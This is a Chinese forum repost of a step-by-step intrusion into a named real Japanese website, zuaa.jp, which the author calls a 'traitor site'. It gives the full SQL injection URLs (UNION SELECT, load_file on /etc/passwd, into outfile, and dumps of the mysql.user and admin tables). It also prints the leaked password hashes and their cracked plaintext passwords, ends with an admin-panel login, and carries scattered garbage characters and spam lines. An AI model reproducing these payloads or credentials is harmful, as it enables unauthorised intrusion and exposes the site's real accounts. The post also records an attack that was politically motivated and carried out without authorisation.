原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

; |  h2 T! O+ A6 x, Z0x01. 检测 www.zuaa.jp 收集数据
1 K  p0 Y5 T, H; L) g9 K

whatweb
0 X) z4 U3 j4 [0 q, [

利用NMAP扫描
2 a* }& ^* g3 D9 W/ N  N: j
# ?0 M# C8 v' W/ ?: p中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
7 U/ c6 `$ T& d: x0x02.找注入点
7 a6 n8 Y: n$ c1 ~+ ?找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390


0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

: c7 {$ _/ n- e4 Dorder by 28报错，order by 27正常

0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
( @# F7 A: B3 ?3 \- r添加到 27 时正常显示
, r8 P, D* @/ F% ^0 B9 r
. b2 C4 J9 k7 \. I  S中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x05. info:
3 Y8 b( P0 p8 U0 e3 [+ j1 v+ \* Chttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

user:            root@localhost
database:    openpne
5 |, a/ Z4 e& C3 Y1 [version:      4.1.22
os:             portbld-freebsd5.4
  W7 ^) S, ]3 j- K3 V, k7 M
0x06. root用户
$ e" M  ?& h. p  j9 U8 b$ W1 }' W利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
( }7 t! s( r. w; o( N
7 h# x6 G. y% ]0 V: y通过工具转换
5 i3 q' Q8 L/ X4 \  m% D3 d% O
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
! v4 U9 P( B, R9 S! {; D
! |# ^# S/ p# I. [: W0x07. 利用 into outfile
全部都失败
" k" B. p! d7 d9 I3 t5 y" Phttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

% {9 u3 L" e7 w( ehttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

( S. |' S& _' U3 G0 \页面显示“MDB2 Error:syntax error”
" X+ ^( N% s7 S! W2 O
0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
6 n; Q& s- G! o: m! C* r. \


$ Y) {" y: G: {' F4 H7 t* w6 g0x09. 查找后台
& h6 n$ p% _9 w' R4 d* ]0 L" U利用 现有的各种 后台工具尝试都不行
- }. L6 R# G8 b! ]5 v
$ X  R+ N' p; N2 V# f0x10.  MySL外联方法
5 v$ |1 H, Q; t3 \9 R从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
* G9 K9 W% G/ A" T可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
+ }5 l+ x9 d9 x9 }; e0 Xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
/ e" ?- a$ n+ f2 p, y0 O
这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
- ~$ e% S" R$ E2 @4 G' _openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
; F. u$ B( ?+ P3 h3 Kzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
3 c$ J1 a$ O) ]工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
! U+ t4 b+ _4 C& }
3 d1 @3 x" L/ }- ?$ o0 P
. ^( t" f. o% D4 `3 ~0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码
' C' I# Q% w1 W7 G/ T' f
  e7 Y/ z- N) ~' j( D, ~; t
0x12. 默认信息利用
/ M; ~/ P. d( x9 T* w8 M( \' ]http://sns.zuaa.jp/?m=admin&a=page_login
. f1 |& B. @' `( l& ]+ {4 c4 Q7 l
表名 (c_admin_user) ，字段名（username,password）
' V; G0 g6 R! x$ v; khttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
4 z. W* z0 @& y6 @3 U2 l
解密
0 t7 g5 M3 G$ {zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
# y* W  P4 x# A9 A5 r6 `( N' \* X( G( p2 Szuaajp:c0923ec5857796a393da99905008c176,          zju1897
" M; S2 N! u, g  u& h
; W3 G- H# R9 U8 G% Y3 z3 B中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

% s6 Y0 J& @8 g& s: h; R+ w0x13. 登录后台
2 V( A8 u. w3 t* L% Z
2 ^$ _9 H8 f+ R* W
0 x  X: X( v8 y* M( a9 c( W* A8 r; }
0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
) u. ?/ R0 C8 U0 y% [: c5 i9 R1 d感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
7 f) ?( \  C1 l2 p------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的